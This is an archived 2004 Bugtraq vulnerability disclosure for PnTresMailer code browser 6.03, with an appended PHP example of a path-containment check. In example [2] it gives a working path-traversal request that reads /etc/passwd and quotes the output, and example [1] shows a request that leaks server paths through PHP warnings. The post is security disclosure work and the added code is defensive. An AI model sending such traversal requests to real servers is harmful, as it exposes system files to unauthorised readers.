Message-ID: <200411261847.iAQIlua1001042@firebird.worldhq.net>
Date: Fri, 26 Nov 2004 18:59:46 -0000
From: "John Cobb" <johnc@...ytes.com>
To: <bugtraq@...urityfocus.com>
Subject: PnTresMailer code browser 6.03 Vulnerabilities

Hello All,

PnTresMailer code browser 6.03 is open to information disclosure.

Author's Site: http://canvas.anubix.net

+-[Examples:]-----+

[1]
www.victimsite.com/codebrowserpntm.php?foldertohighlight=pnTresMailer&filetohighlight=w00t

Warning: highlight_file(codebrowserPnTM/pnTresMailer/w00t): failed to open stream: No such file or directory in /var/www/html/codebrowserpntm.php on line 130

Warning: highlight_file(): Failed opening 'codebrowserPnTM/pnTresMailer/w00t' for highlighting in /var/www/html/codebrowserpntm.php on line 130

[2]
www.victimsite.com/codebrowserpntm.php?downloadfolder=pnTresMailer&filetodownload=../../../../etc/passwd

Look what I've got...

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync

+-[Notes:]-------+

Author is yet to be informed, will do so tonight.

Regards
John C
JohnC@...ytes.com
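
The containment check whose absence example [2] demonstrates, as an added example that is not part of the original post and not PnTresMailer's own code. The parameter names and the codebrowserPnTM directory name come from the message above; the function name resolve_browsable_file() and the assumption that downloads are served from that same directory are hypothetical.

```php
<?php
// Added example, not PnTresMailer's code. resolve_browsable_file() is a
// hypothetical helper; serving downloads from codebrowserPnTM is an assumption.

/**
 * Return the canonical path of $folder/$file when it lies inside $baseDir.
 * Return null when the request escapes $baseDir or names no regular file.
 */
function resolve_browsable_file(string $baseDir, $folder, $file): ?string
{
    // Query parameters can arrive as arrays (?filetodownload[]=x); accept strings only.
    if (!is_string($folder) || !is_string($file)) {
        return null;
    }
    // Reject NUL bytes before any filesystem call sees them.
    if (strpos($folder . $file, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves "..", "." and symlinks, and fails for missing paths.
    $target = realpath($base . DIRECTORY_SEPARATOR . $folder . DIRECTORY_SEPARATOR . $file);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Compare against the base plus a trailing separator, so that a sibling
    // directory sharing the same name prefix is not treated as inside it.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

$path = resolve_browsable_file(
    __DIR__ . '/codebrowserPnTM',
    $_GET['downloadfolder'] ?? '',
    $_GET['filetodownload'] ?? ''
);
if ($path === null) {
    // One generic answer for every failure; no filesystem path in the response,
    // unlike the highlight_file() warnings quoted in example [1].
    http_response_code(404);
    exit('Not found');
}
header('Content-Type: text/plain; charset=utf-8');
header('X-Content-Type-Options: nosniff');
readfile($path);
```

Setting display_errors to Off in php.ini keeps warnings like those in example [1] out of responses even when a code path is missed.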